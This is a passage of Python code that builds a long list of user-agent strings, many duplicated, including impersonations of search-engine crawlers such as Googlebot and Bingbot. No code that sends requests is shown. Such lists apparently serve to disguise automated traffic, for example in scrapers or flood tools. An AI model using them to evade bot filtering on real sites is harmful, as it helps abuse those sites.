uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)')
uagent.append('Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007')
uagent.append('BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)')
uagent.append('Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com')
uagent.append('Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)')
uagent.append('Mozilla/4.0 (compatible; Arachmo)')
uagent.append('Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)')
uagent.append('Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)')
uagent.append('Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)')
uagent.append('BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)')
uagent.append('Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)')
uagent.append('Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)')
uagent.append('Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/uagent)')
uagent.append('Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)')
uagent.append('Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )')
uagent.append('Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)')
uagent.append('Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)')
uagent.append('Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)')
uagent.append('Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)')
uagent.append('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1')
uagent.append('Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)')
uagent.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A')
uagent.append('Mozilla/5.0 (PLAYSTATION 3; 3.55)')
uagent.append('Mozilla/5.0 (PLAYSTATION 3; 2.00)')
uagent.append('Mozilla/5.0 (PLAYSTATION 3; 1.00)')
uagent.append('Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0')
uagent.append('Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)')
uagent.append('SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)')
uagent.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)')
uagent.append('Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))')
uagent.append('Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8')
uagent.append('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)')
uagent.append('Googlebot/2.1 (http://www.googlebot.com/bot.html)')
uagent.append('Opera/9.20 (Windows NT 6.0; U; en)')
uagent.append('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)')
uagent.append('Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16')
uagent.append('Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13')
uagent.append('Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)')
uagent.append('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7')
uagent.append('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)')
uagent.append('YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)')
uagent.append('AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)')
uagent.append('Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)')
uagent.append('Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)')
uagent.append('Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)')
uagent.append('Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)')
uagent.append('Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)')
uagent.append('Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007')
uagent.append('BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179')
uagent.append('Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com')
uagent.append('Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)')
uagent.append('Mozilla/4.0 (compatible; Arachmo)')
uagent.append('Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)')
uagent.append('Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)')
uagent.append('Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)')
uagent.append('Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)')
uagent.append('BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)')
uagent.append('Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)')
uagent.append('Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)')
uagent.append('Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/uagent)')
uagent.append('Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)')
uagent.append('Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )')
uagent.append('Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )')
uagent.append('Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)')
uagent.append('Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)')
uagent.append('Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)')
uagent.append('Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)')
uagent.append('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1')
uagent.append('Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)')
uagent.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A')
uagent.append('Mozilla/5.0 (PLAYSTATION 3; 3.55)')
uagent.append('Mozilla/5.0 (PLAYSTATION 3; 2.00)')
uagent.append('Mozilla/5.0 (PLAYSTATION 3; 1.00)')
uagent.append('Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0')
uagent.append('Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)')
uagent.append('SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)')
uagent.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)')
uagent.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)')
uagent.append('Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))')
uagent.append('Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8')
uagent.append('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
uagent.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57')
uagent.append('Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
uagent.append('Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0')
uagent.append('Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g')
uagent.append('Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125')
uagent.append('Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)')
uagent.append('Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)')
uagent.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
uagent.append('Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)')
uagent.append('Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)')
uagent.append('Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10')
uagent.append('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0')
uagent.append('Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10')
uagent.append('Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)')
uagent.append('Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)')
uagent.append('Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)')
uagent.append('Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/uagent)')
uagent.append('Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16')
uagent.append('Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
uagent.append('Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)')
uagent.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
uagent.append('Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)')
uagent.append('Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7')
uagent.append('BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0')
uagent.append('Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)')
uagent.append('Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)')
uagent.append('Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)')
uagent.append('Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)')
uagent.append('Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007')
uagent.append('BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)')
uagent.append('Googlebot/2.1 (http://www.googlebot.com/bot.html)')
uagent.append('Opera/9.20 (Windows NT 6.0; U; en)')
uagent.append('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)')
uagent.append('Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16')
uagent.append('Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13')
uagent.append('Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)')
uagent.append('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7')
uagent.append('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)')
uagent.append('Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)')
